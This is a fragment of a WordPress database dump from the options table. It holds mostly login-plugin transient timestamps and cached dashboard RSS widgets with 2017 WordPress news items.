(54638, '_transient_timeout_wflginfl_1771891204', '1445418136', 'no'),
(54639, '_transient_wflginfl_1771891204', '1', 'no'),
(54644, '_transient_timeout_wflginfl_3310263998', '1445422850', 'no'),
(54645, '_transient_wflginfl_3310263998', '1', 'no'),
(54811, '_transient_timeout_wflginfl_1389427528', '1445492918', 'no'),
(54812, '_transient_wflginfl_1389427528', '1', 'no'),
(54646, '_transient_timeout_wflginfl_3312766322', '1445425241', 'no'),
(54647, '_transient_wflginfl_3312766322', '1', 'no'),
(54864, '_transient_timeout_wflginfl_784437242', '1445521372', 'no'),
(54865, '_transient_wflginfl_784437242', '1', 'no'),
(57557, '_transient_timeout_wflginfl_3241877319', '1446692921', 'no'),
(57558, '_transient_wflginfl_3241877319', '1', 'no'),
(54661, '_transient_timeout_wflginfl_3123575740', '1445430648', 'no'),
(54662, '_transient_wflginfl_3123575740', '1', 'no'),
(54663, '_transient_timeout_wflginfl_2958850322', '1445432865', 'no'),
(54664, '_transient_wflginfl_2958850322', '1', 'no'),
(54667, '_transient_timeout_wflginfl_1369791584', '1445434927', 'no'),
(54668, '_transient_wflginfl_1369791584', '1', 'no'),
(54669, '_transient_timeout_wflginfl_3680300113', '1445435534', 'no'),
(54670, '_transient_wflginfl_3680300113', '1', 'no'),
(54673, '_transient_timeout_wflginfl_1776501021', '1445436412', 'no'),
(54674, '_transient_wflginfl_1776501021', '1', 'no'),
(54677, '_transient_timeout_wflginfl_1605642616', '1445441526', 'no'),
(54678, '_transient_wflginfl_1605642616', '1', 'no'),
(54680, '_transient_timeout_wflginfl_1565950049', '1445443867', 'no'),
(54681, '_transient_wflginfl_1565950049', '1', 'no'),
(54682, '_transient_timeout_wflginfl_1768005252', '1445445041', 'no'),
(54683, '_transient_wflginfl_1768005252', '1', 'no'),
(54689, '_transient_timeout_wflginfl_1377557067', '1445448463', 'no'),
(54690, '_transient_wflginfl_1377557067', '1', 'no'),
(54691, '_transient_timeout_wflginfl_2057375220', '1445450601', 'no'),
(54692, '_transient_wflginfl_2057375220', '1', 'no'),
(54694, '_transient_timeout_wflginfl_3014860634', '1445452187', 'no'),
(54695, '_transient_wflginfl_3014860634', '1', 'no'),
(54785, '_transient_timeout_wflginfl_1454676198', '1445475564', 'no'),
(54786, '_transient_wflginfl_1454676198', '1', 'no'),
(54698, '_transient_timeout_wflginfl_2591715797', '1445453620', 'no'),
(54699, '_transient_wflginfl_2591715797', '1', 'no'),
(54702, '_transient_timeout_wflginfl_657134839', '1445454769', 'no'),
(54703, '_transient_wflginfl_657134839', '1', 'no'),
(54704, '_transient_timeout_wflginfl_1366041484', '1445454855', 'no'),
(54705, '_transient_wflginfl_1366041484', '1', 'no'),
(54706, '_transient_timeout_wflginfl_1332459282', '1445454898', 'no'),
(54707, '_transient_wflginfl_1332459282', '1', 'no'),
(54897, '_transient_timeout_wflginfl_1410615830', '1445537095', 'no'),
(54898, '_transient_wflginfl_1410615830', '1', 'no'),
(54710, '_transient_timeout_wflginfl_1568037072', '1445456223', 'no'),
(54711, '_transient_wflginfl_1568037072', '1', 'no'),
(54813, '_transient_timeout_wflginfl_3220428808', '1445493354', 'no'),
(54814, '_transient_wflginfl_3220428808', '1', 'no'),
(54714, '_transient_timeout_wflginfl_1538879776', '1445456403', 'no'),
(54715, '_transient_wflginfl_1538879776', '1', 'no'),
(54716, '_transient_timeout_wflginfl_1921432994', '1445456904', 'no'),
(54717, '_transient_wflginfl_1921432994', '1', 'no'),
(54998, '_transient_timeout_wflginfl_1571915365', '1445591217', 'no'),
(54999, '_transient_wflginfl_1571915365', '1', 'no'),
(54726, '_transient_timeout_wflginfl_1451141012', '1445459911', 'no'),
(54727, '_transient_wflginfl_1451141012', '1', 'no'),
(54728, '_transient_timeout_wflginfl_3171229286', '1445460272', 'no'),
(54729, '_transient_wflginfl_3171229286', '1', 'no'),
(54730, '_transient_timeout_wflginfl_1538405510', '1445461756', 'no'),
(54731, '_transient_wflginfl_1538405510', '1', 'no'),
(54733, '_transient_timeout_wflginfl_3035272670', '1445461780', 'no'),
(54734, '_transient_wflginfl_3035272670', '1', 'no'),
(54736, '_transient_timeout_wflginfl_3390403674', '1445461865', 'no'),
(54737, '_transient_wflginfl_3390403674', '1', 'no'),
(54738, '_transient_timeout_wflginfl_2058232248', '1445462216', 'no'),
(54739, '_transient_wflginfl_2058232248', '1', 'no'),
(54740, '_transient_timeout_wflginfl_245878815', '1445462362', 'no'),
(54741, '_transient_wflginfl_245878815', '1', 'no'),
(54742, '_transient_timeout_wflginfl_1549026378', '1445464445', 'no'),
(54743, '_transient_wflginfl_1549026378', '1', 'no'),
(54748, '_transient_timeout_wflginfl_1976157852', '1445465849', 'no'),
(54749, '_transient_wflginfl_1976157852', '1', 'no'),
(55400, '_transient_timeout_wflginfl_1500678369', '1445915405', 'no'),
(54775, '_transient_timeout_wflginfl_1377071300', '1445469667', 'no'),
(54776, '_transient_wflginfl_1377071300', '1', 'no'),
(55172, '_transient_wflginfl_1547371535', '1', 'no'),
(55175, '_transient_timeout_wflginfl_658126635', '1445719713', 'no'),
(55176, '_transient_wflginfl_658126635', '1', 'no'),
(55177, '_transient_timeout_wflginfl_1333157991', '1445720040', 'no'),
(55178, '_transient_wflginfl_1333157991', '1', 'no'),
(54750, '_transient_timeout_wflginfl_532685585', '1445466438', 'no'),
(54751, '_transient_wflginfl_532685585', '1', 'no'),
(57006, '_transient_timeout_wflginfl_1421929377', '1446479062', 'no'),
(57007, '_transient_wflginfl_1421929377', '1', 'no'),
(54754, '_transient_timeout_wflginfl_3033771969', '1445468232', 'no'),
(54755, '_transient_wflginfl_3033771969', '1', 'no'),
(54756, '_transient_timeout_wflginfl_1533630415', '1445468473', 'no'),
(54757, '_transient_wflginfl_1533630415', '1', 'no'),
(54759, '_transient_timeout_wflginfl_2186483040', '1445468997', 'no'),
(54760, '_transient_wflginfl_2186483040', '1', 'no'),
(54762, '_transient_timeout_wflginfl_3241497369', '1445469024', 'no'),
(54763, '_transient_wflginfl_3241497369', '1', 'no'),
(54777, '_transient_timeout_wflginfl_1298290041', '1445471830', 'no'),
(54765, '_transient_timeout_wflginfl_1040178005', '1445469383', 'no'),
(54766, '_transient_wflginfl_1040178005', '1', 'no'),
(54769, '_transient_timeout_wflginfl_100052323', '1445469403', 'no'),
(54770, '_transient_wflginfl_100052323', '1', 'no'),
(54778, '_transient_wflginfl_1298290041', '1', 'no'),
(54781, '_transient_timeout_wflginfl_3310898214', '1445473752', 'no'),
(54782, '_transient_wflginfl_3310898214', '1', 'no'),
(54783, '_transient_timeout_wflginfl_2956740876', '1445474230', 'no'),
(54784, '_transient_wflginfl_2956740876', '1', 'no'),
(54788, '_transient_timeout_wflginfl_3013393866', '1445476269', 'no'),
(54789, '_transient_wflginfl_3013393866', '1', 'no'),
(54794, '_transient_timeout_wflginfl_1768341993', '1445478669', 'no'),
(54795, '_transient_wflginfl_1768341993', '1', 'no'),
(79288, '_transient_timeout_wflginfl_1581881093', '1467638114', 'no'),
(76685, '_transient_timeout_wflginfl_2655351909', '1465199381', 'no'),
(76686, '_transient_wflginfl_2655351909', '19', 'no'),
(76813, '_transient_wflginfl_1539696720', '1', 'no'),
(79462, '_transient_timeout_wflginfl_3162542880', '1467795790', 'no'),
(79463, '_transient_wflginfl_3162542880', '19', 'no'),
(76742, '_transient_timeout_wflginfl_1334345048', '1465238942', 'no'),
(76743, '_transient_wflginfl_1334345048', '19', 'no'),
(76784, '_transient_timeout_wflginfl_3653740006', '1465292123', 'no'),
(76785, '_transient_wflginfl_3653740006', '19', 'no'),
(78180, '_transient_timeout_wflginfl_621390085', '1466484062', 'no'),
(78181, '_transient_wflginfl_621390085', '19', 'no'),
(79395, '_transient_timeout_wflginfl_2513622611', '1467728525', 'no'),
(79396, '_transient_wflginfl_2513622611', '19', 'no'),
(77629, '_transient_timeout_wflginfl_391760936', '1466032141', 'no'),
(77630, '_transient_wflginfl_391760936', '19', 'no'),
(76852, '_transient_timeout_wflginfl_3232365001', '1465351112', 'no'),
(76853, '_transient_wflginfl_3232365001', '19', 'no'),
(78107, '_transient_timeout_wflginfl_1125398391', '1466419278', 'no'),
(78108, '_transient_wflginfl_1125398391', '19', 'no'),
(76899, '_transient_timeout_wflginfl_1307073559', '1465397512', 'no'),
(76900, '_transient_wflginfl_1307073559', '19', 'no'),
(96388, '_transient_timeout_wflginfl_1049988939', '1482574901', 'no'),
(120975, '_transient_timeout_dash_20494a3d90a6669585674ed0eb8dcd8f', '1500234975', 'no'),
(120976, '_transient_dash_20494a3d90a6669585674ed0eb8dcd8f', '<p><strong>RSS Error</strong>: A feed could not be found at http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://www.crosstrainingcenter.be/. A feed with an invalid mime type may fall victim to this error, or SimplePie was unable to auto-discover it.. Use force_feed() if you are certain this URL is a real feed.</p>', 'no'),
(121334, '_transient_wflginfl_3144166239', '2', 'no'),
(121335, '_transient_timeout_wflginfl_831962742', '1500384607', 'no'),
(121336, '_transient_wflginfl_831962742', '2', 'no'),
(121338, '_transient_timeout_wflginfl_1327110560', '1500385602', 'no'),
(121339, '_transient_wflginfl_1327110560', '2', 'no'),
(121345, '_transient_timeout_wflginfl_598069797', '1500390666', 'no'),
(121346, '_transient_wflginfl_598069797', '1', 'no'),
(121350, '_transient_timeout_wflginfl_1978650888', '1500396060', 'no'),
(121351, '_transient_wflginfl_1978650888', '2', 'no'),
(121352, '_transient_timeout_wflginfl_1486653111', '1500397701', 'no'),
(121353, '_transient_wflginfl_1486653111', '2', 'no'),
(121354, '_transient_timeout_wflginfl_1459974947', '1500398219', 'no'),
(121355, '_transient_wflginfl_1459974947', '2', 'no'),
(121362, '_transient_timeout_wflginfl_3680266720', '1500404457', 'no'),
(121363, '_transient_wflginfl_3680266720', '1', 'no'),
(121364, '_transient_timeout_wflginfl_1378840677', '1500404765', 'no'),
(121365, '_transient_wflginfl_1378840677', '2', 'no'),
(121366, '_transient_timeout_wflginfl_3754861785', '1500405789', 'no'),
(121367, '_transient_wflginfl_3754861785', '2', 'no'),
(121368, '_transient_timeout_wflginfl_3577159483', '1500405920', 'no'),
(121369, '_transient_wflginfl_3577159483', '2', 'no'),
(121378, '_transient_timeout_wflginfl_1296412301', '1500410396', 'no'),
(121374, '_transient_timeout_wflginfl_2961775105', '1500409170', 'no'),
(121375, '_transient_wflginfl_2961775105', '2', 'no'),
(121376, '_transient_timeout_wflginfl_1969622199', '1500409459', 'no'),
(121377, '_transient_wflginfl_1969622199', '2', 'no'),
(121380, '_transient_timeout_wflginfl_1324837478', '1500411837', 'no'),
(121381, '_transient_wflginfl_1324837478', '1', 'no'),
(121382, '_transient_timeout_wflginfl_911757147', '1500412069', 'no'),
(121383, '_transient_wflginfl_911757147', '1', 'no'),
(121395, '_transient_timeout_wflginfl_457956911', '1500416718', 'no'),
(121396, '_transient_wflginfl_457956911', '2', 'no'),
(121391, '_transient_timeout_wflginfl_17373758', '1500416106', 'no'),
(121392, '_transient_wflginfl_17373758', '1', 'no'),
(121398, '_transient_timeout_wflginfl_415233868', '1500417229', 'no'),
(121399, '_transient_wflginfl_415233868', '2', 'no'),
(121400, '_transient_timeout_wflginfl_2036543082', '1500420177', 'no'),
(121401, '_transient_wflginfl_2036543082', '2', 'no'),
(121402, '_transient_timeout_wflginfl_3120992176', '1500420343', 'no'),
(121403, '_transient_wflginfl_3120992176', '2', 'no'),
(121407, '_transient_timeout_wflginfl_3014938320', '1500421760', 'no'),
(121408, '_transient_wflginfl_3014938320', '2', 'no'),
(121417, '_transient_wflginfl_1832917706', '2', 'no'),
(121418, '_transient_timeout_wflginfl_1424303882', '1500427675', 'no'),
(121419, '_transient_wflginfl_1424303882', '2', 'no');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(121423, '_transient_timeout_wflginfl_3269181341', '1500429746', 'no'),
(121424, '_transient_wflginfl_3269181341', '1', 'no'),
(121426, '_transient_timeout_wflginfl_3001782822', '1500433136', 'no'),
(121427, '_transient_wflginfl_3001782822', '2', 'no'),
(121431, '_transient_timeout_wflginfl_697295223', '1500436987', 'no'),
(121432, '_transient_wflginfl_697295223', '2', 'no'),
(121433, '_transient_timeout_wflginfl_1317212049', '1500437672', 'no'),
(121434, '_transient_wflginfl_1317212049', '2', 'no'),
(121435, '_transient_timeout_wflginfl_3695954925', '1500438192', 'no'),
(121436, '_transient_wflginfl_3695954925', '2', 'no'),
(121440, '_transient_timeout_wflginfl_3015536834', '1500440098', 'no'),
(121441, '_transient_wflginfl_3015536834', '2', 'no'),
(121445, '_transient_timeout_wflginfl_3178793580', '1500447992', 'no'),
(121446, '_transient_wflginfl_3178793580', '2', 'no'),
(121448, '_transient_timeout_wflginfl_1935868403', '1500449684', 'no'),
(121449, '_transient_wflginfl_1935868403', '2', 'no'),
(121450, '_transient_timeout_wflginfl_247468505', '1500449802', 'no'),
(121451, '_transient_wflginfl_247468505', '1', 'no'),
(121452, '_transient_timeout_wflginfl_3142118403', '1500451865', 'no'),
(121453, '_transient_wflginfl_3142118403', '2', 'no'),
(121454, '_transient_timeout_wflginfl_3359800449', '1500452198', 'no'),
(121455, '_transient_wflginfl_3359800449', '2', 'no'),
(121456, '_transient_timeout_wflginfl_2945508724', '1500452928', 'no'),
(121457, '_transient_wflginfl_2945508724', '2', 'no'),
(121461, '_transient_timeout_wflginfl_3182036186', '1500453378', 'no'),
(121462, '_transient_wflginfl_3182036186', '2', 'no'),
(121463, '_transient_timeout_wflginfl_2107989375', '1500453819', 'no'),
(121464, '_transient_wflginfl_2107989375', '2', 'no'),
(121466, '_transient_timeout_wflginfl_2110869389', '1500456835', 'no'),
(121467, '_transient_wflginfl_2110869389', '2', 'no'),
(121468, '_transient_timeout_wflginfl_1435463714', '1500457195', 'no'),
(121469, '_transient_wflginfl_1435463714', '2', 'no'),
(121470, '_transient_timeout_wflginfl_995672607', '1500458040', 'no'),
(121471, '_transient_wflginfl_995672607', '2', 'no'),
(121477, '_transient_timeout_wflginfl_3120616689', '1500459055', 'no'),
(121478, '_transient_wflginfl_3120616689', '1', 'no'),
(121475, '_transient_timeout_wflginfl_2637302370', '1500458885', 'no'),
(121476, '_transient_wflginfl_2637302370', '2', 'no'),
(121485, '_transient_timeout_wflginfl_3114828415', '1500461182', 'no'),
(121486, '_transient_wflginfl_3114828415', '1', 'no'),
(121487, '_transient_timeout_wflginfl_3413342434', '1500462750', 'no'),
(121488, '_transient_wflginfl_3413342434', '2', 'no'),
(121489, '_transient_timeout_wflginfl_1368753261', '1500463703', 'no'),
(121490, '_transient_wflginfl_1368753261', '1', 'no'),
(121494, '_transient_timeout_wflginfl_3201796910', '1500464178', 'no'),
(121495, '_transient_wflginfl_3201796910', '2', 'no'),
(121496, '_transient_timeout_wflginfl_973658906', '1500465745', 'no'),
(121497, '_transient_wflginfl_973658906', '2', 'no'),
(121498, '_transient_timeout_wflginfl_1711219883', '1500466395', 'no'),
(121499, '_transient_wflginfl_1711219883', '1', 'no'),
(121501, '_transient_timeout_wflginfl_3351375892', '1500467776', 'no'),
(121502, '_transient_wflginfl_3351375892', '1', 'no'),
(120979, '_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1500191776', 'no'),
(120980, '_transient_timeout_dash_4077549d03da2e451c8b5f002294ff51', '1500234976', 'no'),
(120981, '_transient_dash_4077549d03da2e451c8b5f002294ff51', '<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2017/07/the-month-in-wordpress-june-2017/\' title=\'We’re starting a new regular feature on this blog today. We’d like to keep everyone up-to-date about the happenings all across the WordPress open source project and highlight how you can get involved, so we’ll be posting a roundup of all the major WordPress news at the end of every month. Aside from other general […]\'>The Month in WordPress: June 2017</a> <span class=\"rss-date\">July 3, 2017</span><div class=\'rssSummary\'>We’re starting a new regular feature on this blog today. We’d like to keep everyone up-to-date about the happenings all across the WordPress open source project and highlight how you can get involved, so we’ll be posting a roundup of all the major WordPress news at the end of every month. Aside from other general […]</div></li><li><a class=\'rsswidget\' href=\'https://wordpress.org/news/2017/06/evans/\' title=\'An Update with You in Mind Gear up for a more intuitive WordPress! Version 4.8 of WordPress, named “Evans” in honor of jazz pianist and composer William John “Bill” Evans, is available for download or update in your WordPress dashboard. New features in 4.8 add more ways for you to express yourself and represent your brand. Though some […]\'>WordPress 4.8 “Evans”</a> <span class=\"rss-date\">June 8, 2017</span><div class=\'rssSummary\'>An Update with You in Mind Gear up for a more intuitive WordPress! Version 4.8 of WordPress, named “Evans” in honor of jazz pianist and composer William John “Bill” Evans, is available for download or update in your WordPress dashboard. New features in 4.8 add more ways for you to express yourself and represent your brand. Though some […]</div></li></ul></div>', 'no'),
(120982, '_transient_timeout_feed_867bd5c64f85878d03a060509cd2f92c', '1500234976', 'no'),
(120983, '_transient_timeout_feed_mod_867bd5c64f85878d03a060509cd2f92c', '1500234976', 'no'),
(120984, '_transient_feed_mod_867bd5c64f85878d03a060509cd2f92c', '1500191776', 'no'),
(120985, '_transient_timeout_dash_aa95765b5cc111c56d5993d476b1c2f0', '1500234976', 'no'),
(120986, '_transient_dash_aa95765b5cc111c56d5993d476b1c2f0', '<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'https://wptavern.com/gutenberg-0-5-0-adds-new-verse-block-for-poetry-and-a-new-display-for-recent-blocks\' title=\'Another round of Gutenberg updates was released today. Last weekend brought version 0.4.0, which didn’t have too many noteworthy visible changes on the frontend but introduced an API for handling pasted content. Gutenberg developers are aiming to have specific handling for converting pasted content from applications like Word, Markdown, and Google Docs to native WordPress blocks. Version 0.4.0 also added navigation between blocks using arrow keys and included a new approach for rendering embed frames. Gutenberg 0.5.0 hit dashboards today. One major improvement to the writing flow is that the editor will now avoid showing block UI while the user is typing and/or starting a new paragraph in a text block. You can test this by typing and pressing enter twice to begin a new text block. No UI should be visible during this process. Small improvements like this one are gradually bringing a bit more zen to the editor, which is still full of confusing and surprising experiences. Version 0.5.0 adds the ability to upload images via drag-and-drop onto image block placeholders. The example below shows one of my tests. While the image is uploading, it fades in and out. This experience is a bit disconcerting, especially if the upload never resolves. I’m not certain this UI provides the best communication for the status of the image upload.  This version also introduces a new Verse block, which is intended for poetry. It has a slight indent, as compared to a plain text block, but it doesn’t yet work well with copy and paste. Unless you are a poet composing in WordPress, it’s far more likely that you will be pasting in poetry content from somewhere else on the web. Other than the initial bugs, it’s a useful block for those who often post verse.  With the growing number of block types, it can be cumbersome to sort through all of them when adding a new block. Gutenberg 0.5.0 implements a new display for recent blocks. A maximum of eight are shown and the most recently used ones are displayed at the top. It does not yet persist between editor sessions, but Gutenberg contributors plan to add that in the future.  Other notable improvements in this release include the following:  New tabs mode for the sidebar to switch between post settings and block inspector Display warning message when navigating away from the editor with unsaved changes Mobile implementation of block mover, settings, and delete actions Search through all tabs on the inserter and hide tabs Enable ability to add custom classes to blocks (via inspector) Add “table of contents” document outline for headings (with empty heading validation)  Writing Long-Form Content with Gutenberg is Still a Frustrating Experience Gutenberg in its current state is a long way away from being an editor that users would embrace for long-form writing. It still contains many unnerving bugs that steal user confidence. For example, when pasting in multiple paragraphs from a lorem ipsum generator, the editor gave me a white screen and I lost all of the content in my post. After a bit of testing I found that pasting in paragraphs one at a time worked. This kind of frustrating and unexpected behavior has caused many testers to wonder why it isn’t being referred to as alpha software instead of beta. WordPress contributor Jon Brown summed up this common sentiment in a comment on the 0.4.0 release post. “It’s getting better, but it honestly still feels more like a 0.0.4 alpha than a 0.4.0 beta,” Brown said. “I’ve tried writing long form content several times with each version since 0.1.0 and each time I’m quickly frustrated by the lack of flow between blocks. It’s more frustrating than TinyMCE.” Gutenberg needs to make significant progress before it can be suitable for writing anything more than a few short paragraphs. It’s nearly impossible to get into the flow of creating long-form content with the prominence of the block UI. Right now, the editor just gets in the way. The current UI is skewed heavily towards frequent block creation. It is clutter-some and distracting for pure writing tasks. Following the evolution of the editor, with its fast-paced development cycle, is exhilarating after years of stagnation. But the project is sorely in need of a breakthrough where the Gutenberg UI finally gets out of the way of writing. \'>WPTavern: Gutenberg 0.5.0 Adds New Verse Block for Poetry and a New Display for Recent Blocks</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/jetpack-professional-plan-introduces-unlimited-access-to-200-commercial-themes\' title=\'Automattic has been teasing its plan to add commercial themes to Jetpack for several months after introducing theme installation for self-hosted users from WordPress.com. In March, the plugin opened up access to all of WordPress.com’s free themes via the Jetpack Manage interface. All signs pointed to Automattic developing the infrastructure to offer commercial themes via Jetpack upgrades. At that time, however, Jetpack team member Richard Muscat said that Automattic had “no immediate plans to sell themes at this time.”  Yesterday those subscribed to the Jetpack Announcements email were notified that commercial themes have landed in the Jetpack Professional plan, which is regularly priced at $24.92/month or $299/year. Customers will have unlimited access to more than 200 commercial themes that are already available on WordPress.com. Jetpack users on the free plan will see all the themes available in the WordPress.com theme browser with a prompt to upgrade for the ones that are commercial.  The announcement also noted that any themes users elect to use will be automatically backed up and regularly scanned for malware as part of the security services included in the package. For those who are running a multisite network, each site will need its own Jetpack Professional subscription to have access to the commercial themes. For years the WordPress community has speculated about what Automattic’s long game was for Jetpack, and many believed it was only a matter of time before the plugin started offering commercial upgrades. It was introduced to the WordPress world in 2011  as a way to provide feature parity between WordPress.com and self-hosted sites. The first version included just eight modules, but fellow plugin developer and entrepreneurs in the community were immediately aware of its commercial potential. In 2016, Automattic CEO Matt Mullenweg identified both Jetpack and WooCommerce as “multi-billion dollar opportunities” that could each individually be larger than WordPress.com. The plugin is now active on more than 3 million WordPress sites. Automattic’s aggressive commercialization of Jetpack in the past two years is the fulfillment of initial predictions about where the plugin was headed. The new commercial themes offering significantly raises the value of the Jetpack Professional plan, which was previously targeted at business users who require unlimited storage, Google Analytics, and additional SEO features. With the addition of unlimited use of 200+ themes, Automattic has expanded the Professional plan to be more compelling for non-business users who are simply interested in gaining access to a collection of professionally-supported themes. \'>WPTavern: Jetpack Professional Plan Introduces Unlimited Access to 200+ Commercial Themes</a></li><li><a class=\'rsswidget\' href=\'https://buddypress.org/2017/07/buddypress-2-9-0-release-candidate-1/\' title=\'Today sees BP 2.9.0 move to The final testing phase Release Candidate 1. This is the last chance to test out this release and report back any issues found before final release in approximately two weeks time. Any issues found can be reported to our  trac ticket home , or raised on the support forum. Amongst other improvements and fixes to look out for are:  Fixing display of older activity comments. Correction of message when removing friends that are not friends. Group invites – omit sending to previously invited members. Profile image upload fix for IE Edge breaksIOS fix. Correct issue with hidden group &amp; CSS specificity. URL compatibility for LightSpeed. Fix inability resizing of member avatar for cyrillic character filenames.  For a full list of commits see 2.9 tickets A full changelog will be available when we release the final version. You can download the plugin to test from the WP repo BP 2.9.0-RC1 or grab a copy from our SVN repo. A reminder to all theme developers that there are changes to template markup that could effect layouts and ask that they check their themes carefully, the changes are listed below along with changelog links; again any issues or problems please report as soon as possible to the BP trac or slack channel. Template changes In this release there are a number of improvements to templates that add a level of improved a11y performance and markup changes for better semantics &amp; Standards. Theme authors may want to pay particular attention to changes to profile field visibility links and the profile field descriptions where significant markup changes are made that effect positioning of these elements – changesets for these are r11617 &amp; r11618 Nouveau – new template pack If you’re looking for Nouveau as we mentioned in the beta2 announcement we have delayed the release of this new template pack to ensure it receives as much code checking &amp; refinement as possible and we’ll be looking to probably package this as it’s own release shortly after 2.9 is released. We thank you in advance for all testing and reports and it need not be mentioned but please don’t run Beta or RC releases in a production environment only on test installs. Regards, The BuddyPress team.\'>BuddyPress: BuddyPress 2.9.0 Release Candidate 1</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/cokinetic-systems-pursues-100-million-gpl-license-violation-case-against-panasonic-avionics\' title=\'photo credit: Paper Plane – (license) Open source software has made its way into nearly every industry, but a recent open source security and risk analysis shows widespread license compliance risks, with 75% of the audited applications including GPL license conflicts. Although most violations are unintentional, there are some cases where companies do not comply with the license in order to block competitors from developing similar software. GPL enforcement doesn’t often lead to litigation. When it does, most other avenues of resolving the complaint have already been exhausted. A lawsuit in the air transport industry is currently bringing more attention to the gravity of not complying with open source software licensing requirements. CoKinetic Systems, a developer and manufacturer of in-flight entertainment (IFE) software, has filed a case against Panasonic Avionics that includes allegations of a fairly egregious breach of the GPL. The complaint alleges that Panasonic Avionics has monopolized the Panasonic IFE Software and Media Services Market by deliberately refusing to distribute the source code for its open-source Linux-based operating system: More specifically, Panasonic has built the Linux-Based Panasonic Core Software using the open-source Linux kernel, which is clearly governed by the GPL, together with Panasonic’s own modified Linux modules, which are likewise governed by the GPL.  Indeed, Panasonic has itself affirmatively identified its own modified modules as being subject to the GPL, because the original Linux modules were specifically designed to generate warning messages if other code is linked with or otherwise combined with the Linux modules that are not licensed under the GPL. To suppress these warnings, Panasonic willfully acted to insert code into its own modules to indicate that they were licensed under the GPL. Panasonic has incorporated a massive amount of open source modules, programs, and libraries into the Linux-Based Panasonic Core Software, without distributing notices or source code to the Linux-Based Panasonic Core Software, or even to any part of it…By deliberately refusing to distribute the source code to the Linux-Based Panasonic Core Software in accordance with its GPL obligations, Panasonic intentionally deprives competitors in the market from having the ability to develop software that can access the basic features and capabilities of Panasonic IFE Hardware. CoKinetic Systems contends that Panasonic’s refusal to distribute its source code voids its GPL license and “potentially exposes Panasonic to billions of dollars in statutory damages for hundreds of thousands of hardware installations that willfully infringe copyrights belonging to hundreds or even thousands of software developers that freely contributed source code to Linux.” Furthermore, the complaint details how competitors have to rely on Panasonic’s APIs in order to offer software services to airlines using Panasonic’s IFE hardware, because they do not have access to the source code for the Linux-based core software. CoKinetic claims that Panasonic also deliberately blocks competitor products by its selective distribution of its APIs, resulting in stifled industry innovation and monopoly control over the Panasonic IFE Software and Media Services Market. Perhaps the worst and most grave allegation in the complaint is that, in addition to locking up the source code and doling out access to the APIs, Panasonic also maliciously sabotaged its own APIs in order to give the appearance that it is the only reliable software service provider for its hardware, which CoKinetic claims is inferior and sold at monopolistic prices. Panasonic also is able to use its control over the Linux-Based Panasonic Core Software in order to make ongoing, undisclosed, and often malicious modifications to its source code, deliberately “breaking” Panasonic’s own APIs in order to purposely and maliciously sabotage the performance of third-party software products that Panasonic deems a competitive threat — particularly CoKinetic software. In the introduction to the case, CoKinetic cites a litany of anti-competitive conduct the company has engaged in over the past decade before detailing the current allegations. The case is not purely an open source license dispute, as the plaintiff also alleges that Panasonic abused regulatory processes, engaged in acts of corporate espionage, defamed CoKinetic, paid commercial bribes, and employed unlawful means to monopolize the Panasonic IFE Software and Media Services Market. CoKinetic is seeking compensatory damages for Panasonic’s GPL ongoing GPL breaches. The specific amount would be determined at the trial but the company believes it to be in excess of $100 million. The company also wants the court to compel Panasonic to publicly disclose and distribute the source code. This isn’t a case where distributing the source code is just a small sticking point or just a matter of principle. It has the potential to open up the IFE industry for faster progress and greater innovation. Many reading this article have undoubtedly used Panasonic’s IFE products when flying with the company’s customers, which include Emirates Airlines, Delta Air Lines, Virgin America, and United Airlines. With the source code available, airline customers could remove Panasonic’s software from their IFE hardware and replace it with their own software solutions. The complaint, which was filed in the Southern District of New York in March, demands a jury trial. An initial pre-trial conference was held in May, but the case has been slow moving. The Court gave a deadline for the Defendant to file its motion to dismiss, but deadlines have since been extended. The Court also strongly recommended that the two parties retain a private mediator but it’s not clear how outside mediation could solve such a far-reaching matter that impacts so many vendors. Additional documents are due over the next few months, so it will be some time before there are updates on the progress of the case. \'>WPTavern: CoKinetic Systems Pursues $100 Million GPL License Violation Case Against Panasonic Avionics</a></li><li><a class=\'rsswidget\' href=\'https://wptavern.com/aj-morris-acquires-ithemes-exchange\' title=\'In 2013, iThemes released Exchange, an e-commerce platform that aimed to make selling online as simple as possible. Today, the company announced that AJ Morris, Product Manager at Liquid Web, has taken over the project. “When approached about taking over iThemes Exchange early this year, we wanted to be sure the project and our customers went into very competent hands, someone who will love and care for them as much as we do,” Cory Miller, founder of iThemes, said. “Having spent four and a half years investing in the project and in you and your success, we did not take this lightly. “After numerous conversations over the past several months, we believe the best home for Exchange is with ExchangeWP LLC led by AJ Morris.” Everything iThemes Exchange related will transition to ExchangeWP.com. Toolkit, Plugin Suite, Exchange Pro Pack, and iThemes Exchange Add-on customers will be given accounts for free support and upgrades through August 2018 at ExchangeWP.com. Beginning today, customers will no longer be able to purchase Exchange or its add-ons through iThemes as the company transfers licenses and products to ExchangeWP. However, iThemes will continue to provide customer support until the transition is completed, expected to happen in early August. Morris says he’ll continue to focus on making e-commerce simple and will provide regular updates to customers to provide insight into what goes into transition a product from one company to another and where the product is heading. “These days, it’s very easy to get WordPress up and running so you can start blogging,” Morris said. “But when you want to add e-commerce to the mix, it’s a bit different.” “With big players like WooCommerce out there, it becomes too much too quickly for the average content producer to get their store up and running. “Exchange is going to continue focusing on the independent publishers that want to keep the revenue they can, while providing a simplistic experience in an easy-to-use e-commerce plugin that will help get their stores online quickly.” Allowing Morris to take over the project frees up resources for iThemes to focus on three of its flagship products; BackupBuddy, iThemes Security, and iThemes Sync. In addition to their core products, the company says it will soon release a new project. “My job as CEO is to be a steward of the time and resources we have at iThemes in order to serve you best,” Miller said. “We’ve realized for a while that it was past time for us to refocus our finite resources on the projects that have the most growth and potential for our company and you. “That meant we either needed to find a new home for Exchange or sunset the project. I’m thankful we didn’t have to do the latter.” Morris is a long-time member of the WordPress community and has spoken at several WordCamps. With Morris taking over the reigns, existing customers won’t have to worry about finding a replacement. \'>WPTavern: AJ Morris Acquires iThemes Exchange</a></li></ul></div>', 'no'),
(55700, '_transient_wflginfl_1449144430', '1', 'no'),
(55701, '_transient_timeout_wflginfl_3386801942', '1445981296', 'no'),
(55702, '_transient_wflginfl_3386801942', '1', 'no'),
